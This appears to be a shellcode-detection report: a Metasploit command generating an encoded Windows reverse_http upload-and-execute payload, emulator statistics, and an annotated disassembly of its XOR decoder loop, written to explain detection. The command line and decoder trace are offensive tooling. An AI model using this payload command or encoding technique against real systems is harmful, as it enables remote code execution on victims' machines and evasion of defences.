======== Shellcode generation command ========
msfpayload windows/upexec/reverse_http PEXEC=./ LHOST=127.0.0.1 LPORT=31337 R | msfencode -e x86/jmp_call_additive -t raw

======== Payload investigation statistics ========
Suspicious payload offset: 0

Emulation attribute name                 Value
=======================================================
WRITES_TO_PROCESS_STACK_MEMORY           1
BUFFER_INSIDE_WRITES_COUNT               19
REFERENCES_TO_PROCESS_INTERNALS          0
BUFFER_OUTSIDE_WRITES_COUNT              0
FAR_JUMPS_COUNT                          0
FULLY_INITIALIZED_INSTRUCTIONS           100
PROVIDED_ABSOLUTE_MEMORY_ADDRESSES       1
PROC_CALLS_INSIDE_INV_BUFFER             1
BUFFER_OUTSIDE_READS_COUNT               2
UNDEFINED_DIRECT_CALLS                   0
JUMPS_INSIDE_INV_BUFFER                  19
CORRECTLY_PARSED_INSTRUCTIONS            100
MEMORY_MODIFYING_MATH_INSTRUCTIONS       0
BUFFER_INSIDE_READS_COUNT                19
SYSTEM_CALLS_COUNT                       0
UNRECOGNIZED_CALL_TARGETS                0
REFERENCES_TO_PROCESS_IMPORTS            0
CORRECT_PROCEDURES_CALLS                 0
EIP_RETRIEVAL_INSTRUCTIONS               0
JUMPS_TO_PROCESS_INTERNALS               0
EXECUTED_ARITHMETIC_INSTRUCTIONS         0
CALLS_TARGETED_IMPORTS_SECTION           0
UNRECOGNIZED_JUMP_TARGETS                0
CONSEQUENT_SINGLE_BYTE_INSTRUCTIONS      2
REFERENCES_TO_PROCESS_EXPORTS            0
EXECUTES_BITS_OPERATING_INSTRUCTIONS     0
IMMEDIATE_OPERANDS_INSTRUCTIONS          0
INDIRECT_BUFFER_REFERENCES               2
MAX_WRITTEN_MEMORY_BLOCK                 0
CORRECTLY_EXECUTED_INSTRUCTIONS          100
READS_FROM_PROCESS_STACK_MEMORY          1
CALLS_TARGETED_EXPORTS_SECTION           0

More about the Quttera investigation engine here
======== Detection disassembly ========
CLD
MOV EBX (0x00000000),0x3E26957C
JMP 0x0C ;random read instruction
CALL 0xBFFCA744
POP ESI (0x00000000)
PUSH ESI (0xBFFCA755)
XOR DS:[ESI] (0xBFFCA755),EBX (0x3E26957C) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 1 0xBFFCA755
ADD EBX (0x3E26957C),EAX (0x0089E8FC)
TEST EAX (0x0089E8FC),EAX (0x0089E8FC)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA759),EBX (0x3EB07E78) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 2 0xBFFCA759
ADD EBX (0x3EB07E78),EAX (0x89600000)
TEST EAX (0x89600000),EAX (0x89600000)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA75D),EBX (0xC8107E78) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 3 0xBFFCA75D
ADD EBX (0xC8107E78),EAX (0x64D231E5)
TEST EAX (0x64D231E5),EAX (0x64D231E5)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA761),EBX (0x2CE2B05D) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 4 0xBFFCA761
ADD EBX (0x2CE2B05D),EAX (0x8B30528B)
TEST EAX (0x8B30528B),EAX (0x8B30528B)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA765),EBX (0xB81302E8) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 5 0xBFFCA765
ADD EBX (0xB81302E8),EAX (0x528B0C52)
TEST EAX (0x528B0C52),EAX (0x528B0C52)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA769),EBX (0x0A9E0F3A) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 6 0xBFFCA769
ADD EBX (0x0A9E0F3A),EAX (0x28728B14)
TEST EAX (0x28728B14),EAX (0x28728B14)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA76D),EBX (0x33109A4E) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 7 0xBFFCA76D
ADD EBX (0x33109A4E),EAX (0x264AB70F)
TEST EAX (0x264AB70F),EAX (0x264AB70F)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA771),EBX (0x595B515D) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 8 0xBFFCA771
ADD EBX (0x595B515D),EAX (0xC031FF31)
TEST EAX (0xC031FF31),EAX (0xC031FF31)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA775),EBX (0x198D508E) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 9 0xBFFCA775
ADD EBX (0x198D508E),EAX (0x7C613CAC)
TEST EAX (0x7C613CAC),EAX (0x7C613CAC)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA779),EBX (0x95EE8D3A) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 10 0xBFFCA779
ADD EBX (0x95EE8D3A),EAX (0xC1202C02)
TEST EAX (0xC1202C02),EAX (0xC1202C02)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA77D),EBX (0x570EB93C) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 11 0xBFFCA77D
ADD EBX (0x570EB93C),EAX (0xC7010DCF)
TEST EAX (0xC7010DCF),EAX (0xC7010DCF)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA781),EBX (0x1E0FC70B) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 12 0xBFFCA781
ADD EBX (0x1E0FC70B),EAX (0x5752F0E2)
TEST EAX (0x5752F0E2),EAX (0x5752F0E2)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA785),EBX (0x7562B7ED) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 13 0xBFFCA785
ADD EBX (0x7562B7ED),EAX (0x8B10528B)
TEST EAX (0x8B10528B),EAX (0x8B10528B)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA789),EBX (0x00730A78) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 14 0xBFFCA789
ADD EBX (0x00730A78),EAX (0xD0013C42)
TEST EAX (0xD0013C42),EAX (0xD0013C42)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA78D),EBX (0xD07446BA) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 15 0xBFFCA78D
ADD EBX (0xD07446BA),EAX (0x8578408B)
TEST EAX (0x8578408B),EAX (0x8578408B)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA791),EBX (0x55EC8745) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 16 0xBFFCA791
ADD EBX (0x55EC8745),EAX (0x014A74C0)
TEST EAX (0x014A74C0),EAX (0x014A74C0)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA795),EBX (0x5736FC05) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 17 0xBFFCA795
ADD EBX (0x5736FC05),EAX (0x488B50D0)
TEST EAX (0x488B50D0),EAX (0x488B50D0)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA799),EBX (0x9FC24CD5) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 18 0xBFFCA799
ADD EBX (0x9FC24CD5),EAX (0x20588B18)
TEST EAX (0x20588B18),EAX (0x20588B18)
JNZ 0xF7 ;random read instruction
XOR DS:[ESI] (0xBFFCA79D),EBX (0xC01AD7ED) ;investigation buffer write instruction
LODSD ; investigation buffer read instruction 19 0xBFFCA79D
ADD EBX (0xC01AD7ED),EAX (0x3CE3D301)
TEST EAX (0x3CE3D301),EAX (0x3CE3D301)

Reading the trace: the JMP / CALL / POP ESI prologue is a call-pop GetPC idiom that leaves ESI pointing at the encoded body (0xBFFCA755); each round XORs one dword at [ESI] with the running key in EBX, LODSD loads the now-decoded dword into EAX and advances ESI, and ADD EBX,EAX folds the plaintext back into the key, so every dword is decoded under a different key (e.g. 0x3E26957C + 0x0089E8FC = 0x3EB07E78, the key used on the next dword). The loop is meant to stop when a decoded dword is zero (TEST EAX,EAX / JNZ), but that never happens here: the trace holds exactly 100 instructions (6 in the prologue plus 19 rounds of 5, with the last round cut after TEST), matching the CORRECTLY_EXECUTED_INSTRUCTIONS value of 100, so the cut-off appears to be the emulator's instruction budget rather than the decoder finishing. Note also that EIP_RETRIEVAL_INSTRUCTIONS, EXECUTED_ARITHMETIC_INSTRUCTIONS and EXECUTES_BITS_OPERATING_INSTRUCTIONS are all reported as 0 despite the visible CALL/POP, 19 ADDs and 19 XORs, so these counters evidently do not measure plain mnemonic counts and should not be relied on as a signature for this decoder.